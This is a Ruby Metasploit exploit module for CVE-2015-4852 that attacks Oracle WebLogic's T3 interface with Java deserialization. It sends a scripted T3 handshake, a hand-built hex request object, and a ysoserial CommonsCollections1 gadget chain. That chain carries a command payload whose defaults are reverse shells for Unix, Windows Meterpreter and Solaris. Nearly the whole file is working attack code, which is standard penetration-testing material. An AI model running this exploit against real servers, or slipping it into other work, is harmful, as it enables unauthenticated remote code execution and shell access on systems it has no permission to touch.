require 'msf/core/exploit/powershell'
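# Exploit module for CVE-2015-4852: Java deserialization over the WebLogic
# T3 listener. The module speaks a minimal T3 handshake, sends a hand-built
# request object, and then delivers a serialized object whose payload is a
# ysoserial CommonsCollections1 chain wrapping the selected command payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell

  # Module metadata. RPORT defaults to 7001, the usual T3 port.
  #
  # @param info [Hash] module info supplied by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Oracle Weblogic Server Deserialization RCE - Raw Object',
      'Description' => %q{
        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
        interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)
        to the interface to execute code on vulnerable hosts.
      },
      'Author' =>
        [
          'Andres Rodriguez',
          'Stephen Breen',
          'Aaron Soto'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2015-4852']
        ],
      'Privileged' => false,
      'Platform' => %w{ unix win solaris },
      'Targets' =>
        [
          [ 'Unix',
            'Platform' => 'unix',
            'Arch' => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'},
            'Payload' => {
              'Encoder' => 'cmd/ifs',
              'BadChars' => ' ',
              'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'python'}
            }
          ],
          [ 'Windows',
            'Platform' => 'win',
            'Payload' => {},
            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
          ],
          [ 'Solaris',
            'Platform' => 'solaris',
            'Arch' => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
            'Payload' => {
              'Space' => 2048,
              'DisableNops' => true,
              'Compat' =>
                {
                  'PayloadType' => 'cmd',
                  'RequiredCmd' => 'generic perl telnet',
                }
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jan 28 2015'))

    register_options([Opt::RPORT(7001)])
  end

=begin This check is currently incompatible with the Tcp mixin.:-(
  # send_request_cgi comes from the HttpClient mixin, which this module does not
  # include; the check is kept here for reference only. It fingerprints the
  # admin console login page and compares the advertised version against the
  # last affected release of each branch.
  def check
    resp = send_request_cgi(
      'method' => 'GET',
      'uri' => '/console/login/LoginForm.jsp'
    )

    return CheckCode::Unknown unless resp && resp.code == 200

    unless resp.body.include?('Oracle WebLogic Server Administration Console')
      vprint_warning("Oracle WebLogic Server banner cannot be found")
      return CheckCode::Unknown
    end

    /WebLogic Server Version: (?<version>\d+\.\d+\.\d+\.\d*)/ =~ resp.body
    unless version
      vprint_warning("Oracle WebLogic Server version cannot be found")
      return CheckCode::Unknown
    end

    version = Gem::Version.new(version)
    vprint_good("Detected Oracle WebLogic Server Version: #{version}")

    case
    when version.to_s.start_with?('10.3')
      return CheckCode::Appears unless version > Gem::Version.new('10.3.6.0')
    when version.to_s.start_with?('12.1.2')
      return CheckCode::Appears unless version > Gem::Version.new('12.1.2.0')
    when version.to_s.start_with?('12.1.3')
      return CheckCode::Appears unless version > Gem::Version.new('12.1.3.0')
    when version.to_s.start_with?('12.2')
      return CheckCode::Appears unless version > Gem::Version.new('12.2.1.0')
    end

    return CheckCode::Safe
  end
=end

  # Sends the T3 greeting ("t3 <version>") followed by the AS/HL/MS header
  # fields and a blank line, then pauses one second and reads whatever the
  # server sends back.
  #
  # @return [String, nil] the raw reply as returned by sock.get_once
  def t3_handshake
    shake = "t3 12.2.1\n"
    shake << "AS:255\n"
    shake << "HL:19\n"
    shake << "MS:10000000\n\n"
    sock.put(shake)
    sleep(1)
    sock.get_once
  end

  # Sends the T3 request object that precedes the payload. The body is a
  # hex-encoded byte string: a fixed header, followed by several Java
  # serialization streams (each introduced by fe010000 / aced0005) that carry
  # weblogic.rjvm.ClassTableEntry and weblogic.rjvm.JVMID objects. Two fields
  # are randomized per run, and the remote port is embedded as a 2-byte value.
  #
  # The total length field at the start (000005c3) is hard-coded, so the
  # randomized fields must keep their fixed sizes (18 and 4 bytes).
  #
  # @return [String, nil] the raw reply as returned by sock.get_once
  def build_t3_request_object
    data = '000005c3'
    data << '01'
    data << '65'
    data << '01'
    data << 'ffffffff'
    data << 'ffffffff'
    data << '0000006a'
    data << '0000ea60'
    data << '0000001900937b484a'
    data << '56fa4a777666f581daa4f5b90e2aebfc607499'
    data << 'b4027973720078720178720278700000000a00'
    data << '00000300000000000000060070707070707000'
    data << '00000a000000030000000000000006007006'
    data << 'fe010000'
    data << 'aced0005'
    data << '73'
    data << '72001d'
    data << '7765626c6f6769632e726a766d2e436c617373'
    data << '5461626c65456e747279'
    data << '2f52658157f4f9ed'
    data << '0c00007870'
    data << '72'
    data << '00247765626c6f6769632e636f6d6d6f6e2e696e74'
    data << '65726e616c2e5061636b616765496e666f'
    data << 'e6f723e7b8ae1ec9'
    data << '02'
    data << '0008'
    data << '4900056d616a6f72'
    data << '4900056d696e6f72'
    data << '49000c726f6c6c696e675061746368'
    data << '49000b736572766963655061636b'
    data << '5a000e74656d706f726172795061746368'
    data << '4c0009696d706c5469746c65'
    data << '7400124c6a6176612f6c616e672f537472696e673b'
    data << '4c000a696d706c56656e646f72'
    data << '71007e0003'
    data << '4c000b696d706c56657273696f6e'
    data << '71007e0003'
    data << '78707702000078'
    data << 'fe010000'
    data << 'aced0005'
    data << '7372'
    data << '001d7765626c6f6769632e726a766d2e436c6173'
    data << '735461626c65456e747279'
    data << '2f52658157f4f9ed'
    data << '0c'
    data << '00007870'
    data << '72'
    data << '00247765626c6f6769632e636f6d6d6f6e2e696'
    data << 'e7465726e616c2e56657273696f6e496e666f'
    data << '972245516452463e'
    data << '02'
    data << '0003'
    data << '5b0008'
    data << '7061636b61676573'
    data << '740027'
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'
    data << '6e7465726e616c2f5061636b616765496e666f'
    data << '3b'
    data << '4c000e'
    data << '72656c6561736556657273696f6e'
    data << '740012'
    data << '4c6a6176612f6c616e672f537472696e673b'
    data << '5b0012'
    data << '76657273696f6e496e666f41734279746573'
    data << '740002'
    data << '5b42'
    data << '78'
    data << '720024'
    data << '7765626c6f6769632e636f6d6d6f6e2e696e'
    data << '7465726e616c2e5061636b616765496e666f'
    data << 'e6f723e7b8ae1ec9'
    data << '02'
    data << '0008'
    data << '4900056d616a6f72'
    data << '4900056d696e6f72'
    data << '49000c726f6c6c696e675061746368'
    data << '49000b736572766963655061636b'
    data << '5a000e74656d706f726172795061746368'
    data << '4c0009696d706c5469746c65'
    data << '71'
    data << '007e0004'
    data << '4c000a696d706c56656e646f72'
    data << '71'
    data << '007e0004'
    data << '4c000b696d706c56657273696f6e'
    data << '71'
    data << '007e0004'
    data << '78'
    data << '70'
    data << '77020000'
    data << '78'
    data << 'fe010000'
    data << 'aced0005'
    data << '73'
    data << '72001d'
    data << '7765626c6f6769632e726a766d2e436c617373'
    data << '5461626c65456e747279'
    data << '2f52658157f4f9ed'
    data << '0c00007870'
    data << '720021'
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'
    data << '65726e616c2e50656572496e666f'
    data << '585474f39bc908f1'
    data << '02'
    data << '0006'
    data << '4900056d616a6f72'
    data << '4900056d696e6f72'
    data << '49000c726f6c6c696e675061746368'
    data << '49000b736572766963655061636b'
    data << '5a000e74656d706f726172795061746368'
    data << '5b00087061636b61676573'
    data << '740027'
    data << '5b4c7765626c6f6769632f636f6d6d6f6e2f69'
    data << '6e7465726e616c2f5061636b616765496e666f'
    data << '3b'
    data << '78'
    data << '720024'
    data << '7765626c6f6769632e636f6d6d6f6e2e696e74'
    data << '65726e616c2e56657273696f6e496e666f'
    data << '972245516452463e'
    data << '02'
    data << '0003'
    data << '5b0008'
    data << '7061636b6167657371'
    data << '007e0003'
    data << '4c000e72656c6561736556657273696f6e'
    data << '7400124c6a6176612f6c616e672f537472696e673b'
    data << '5b001276657273696f6e496e666f41734279746573'
    data << '740002'
    data << '5b42'
    data << '78'
    data << '720024'
    data << '7765626c6f6769632e636f6d6d6f6e2e696e746572'
    data << '6e616c2e5061636b616765496e666f'
    data << 'e6f723e7b8ae1ec9'
    data << '02'
    data << '0008'
    data << '4900056d616a6f72'
    data << '4900056d696e6f72'
    data << '49000c726f6c6c696e675061746368'
    data << '49000b736572766963655061636b'
    data << '5a000e74656d706f726172795061746368'
    data << '4c0009696d706c5469746c65'
    data << '71'
    data << '007e0005'
    data << '4c000a696d706c56656e646f72'
    data << '71'
    data << '007e0005'
    data << '4c000b696d706c56657273696f6e'
    data << '71'
    data << '007e0005'
    data << '78'
    data << '707702000078'
    data << 'fe00ff'
    data << 'fe010000'
    data << 'aced0005'
    data << '73'
    data << '720013'
    data << '7765626c6f6769632e726a766d2e4a564d4944'
    data << 'dc49c23ede121e2a'
    data << '0c'
    data << '0000'
    data << '78'
    data << '70'
    data << '7750'
    data << '21'
    data << '000000000000000000'
    data << '0d'
    data << '3030302e3030302e3030302e30'
    data << '00'
    data << '12'
    # 18 random alphanumeric bytes, hex-encoded; length is fixed by the
    # preceding '12' length byte.
    data << rand_text_alphanumeric(18).unpack('H*')[0]
    data << '83348cd6'
    data << '000000070000'
    # Remote port as a 2-byte big-endian hex field.
    data << rport.to_s(16).rjust(4, '0')
    data << 'ffffffffffffffffffffffffffffffffffffff'
    data << 'ffffffffff'
    data << '78'
    data << 'fe010000'
    data << 'aced0005'
    data << '73'
    data << '72'
    data << '00137765626c6f6769632e726a766d2e4a564d4944'
    data << 'dc49c23ede121e2a'
    data << '0c'
    data << '0000'
    data << '78'
    data << '70'
    data << '77'
    data << '20'
    data << '0114dc42bd071a772700'
    data << '0d'
    data << '3030302e3030302e3030302e30'
    # 4 random alphanumeric bytes, hex-encoded.
    data << rand_text_alphanumeric(4).unpack('H*')[0]
    data << '00000000'
    data << '78'
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Builds and sends the object stream that carries the deserialization
  # gadget. The command for the chosen target is wrapped in a ysoserial
  # CommonsCollections1 object, embedded in a hand-built sequence of
  # serialization streams, and prefixed with a 4-byte big-endian length.
  #
  # The local holding the hex body is named `obj` rather than `payload` so it
  # does not shadow the framework's `payload` accessor (the original code
  # relied on parse order to read `payload.encoded` before the local existed).
  #
  # @return [String, nil] the raw reply as returned by sock.get_once
  # @raise [Msf::Exploit::Failed] via fail_with when the target name is not
  #   one of the three defined targets
  def send_payload_objdata
    cmd = case target.name
          when 'Windows'
            cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true})
          when 'Unix', 'Solaris'
            payload.encoded
          else
            fail_with(Failure::NoTarget, "Unsupported target: #{target.name}")
          end

    obj = '056508000000010000001b0000005d0101007372017870737202787000000000'
    obj << '00000000757203787000000000787400087765626c6f67696375720478700000'
    obj << '000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306'
    obj << 'fe010000'
    obj << 'aced0005'
    obj << '73'
    obj << '72'
    obj << '001d7765626c6f6769632e726a766d2e436c61'
    obj << '73735461626c65456e747279'
    obj << '2f52658157f4f9ed'
    obj << '0c'
    obj << '0000'
    obj << '7870'
    obj << '72'
    obj << '00025b42'
    obj << 'acf317f8060854e0'
    obj << '02'
    obj << '0000'
    obj << '7870'
    obj << '77'
    obj << '020000'
    obj << '78'
    obj << 'fe010000'
    obj << 'aced0005'
    obj << '73'
    obj << '72'
    obj << '001d7765626c6f6769632e726a766d2e436c61'
    obj << '73735461626c65456e747279'
    obj << '2f52658157f4f9ed'
    obj << '0c'
    obj << '0000'
    obj << '7870'
    obj << '72'
    obj << '00135b4c6a6176612e6c616e672e4f626a'
    obj << '6563743b'
    obj << '90ce589f1073296c'
    obj << '02'
    obj << '0000'
    obj << '7870'
    obj << '77'
    obj << '020000'
    obj << '78'
    obj << 'fe010000'
    obj << 'aced0005'
    obj << '73'
    obj << '72'
    obj << '001d7765626c6f6769632e726a766d2e436c61'
    obj << '73735461626c65456e747279'
    obj << '2f52658157f4f9ed'
    obj << '0c'
    obj << '0000'
    obj << '7870'
    obj << '72'
    obj << '00106a6176612e7574696c2e566563746f72'
    obj << 'd9977d5b803baf01'
    obj << '03'
    obj << '0003'
    obj << '4900116361706163697479496e6372656d656e74'
    obj << '49000c656c656d656e74436f756e74'
    obj << '5b000b656c656d656e7444617461'
    obj << '7400135b4c6a6176612f6c616e672f4f626a6563'
    obj << '743b'
    obj << '7870'
    obj << '77'
    obj << '020000'
    obj << '78'
    obj << 'fe010000'
    # The gadget chain is generated by the framework helper and hex-encoded to
    # match the rest of the body.
    ysoserial_payload = ::Msf::Util::JavaDeserialization.ysoserial_payload("CommonsCollections1", cmd)
    obj << ysoserial_payload.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
    obj << 'fe010000'
    obj << 'aced0005'
    obj << '73'
    obj << '72'
    obj << '00257765626c6f6769632e726a766d2e496d6d75'
    obj << '7461626c6553657276696365436f6e74657874'
    obj << 'ddcba8706386f0ba'
    obj << '0c'
    obj << '0000'
    obj << '78'
    obj << '72'
    obj << '00297765626c6f6769632e726d692e70726f76'
    obj << '696465722e426173696353657276696365436f'
    obj << '6e74657874'
    obj << 'e4632236c5d4a71e'
    obj << '0c'
    obj << '0000'
    obj << '7870'
    obj << '77'
    obj << '020600'
    obj << '7372'
    obj << '00267765626c6f6769632e726d692e696e7465'
    obj << '726e616c2e4d6574686f644465736372697074'
    obj << '6f72'
    obj << '12485a828af7f67b'
    obj << '0c'
    obj << '0000'
    obj << '7870'
    obj << '77'
    obj << rand_text_alphanumeric(52).unpack('H*')[0]
    obj << '78'
    obj << '78'
    obj << 'fe00ff'

    # Length prefix: body byte count (hex chars / 2) plus the 4 bytes of the
    # length field itself, as an 8-hex-digit big-endian value.
    data = ((obj.length >> 1) + 4).to_s(16).rjust(8, '0')
    data << obj
    sock.put([data].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Runs the three exchanges in order over a single TCP connection, then
  # starts the payload handler and disconnects.
  def exploit
    connect
    print_status('Sending handshake...')
    t3_handshake
    print_status('Sending T3 request object...')
    build_t3_request_object
    print_status('Sending client object payload...')
    send_payload_objdata
    handler
    disconnect
  end
end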